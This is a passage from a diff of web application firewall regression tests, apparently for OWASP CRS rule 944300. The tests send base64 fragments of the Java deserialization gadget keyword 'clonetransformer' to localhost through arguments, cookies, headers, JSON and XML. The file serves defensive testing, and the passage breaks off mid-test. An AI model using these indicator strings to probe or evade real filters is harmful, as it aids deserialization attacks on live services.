- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: 
[944300] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 87 desc: "Content-Type application/json 
arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: 
- dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
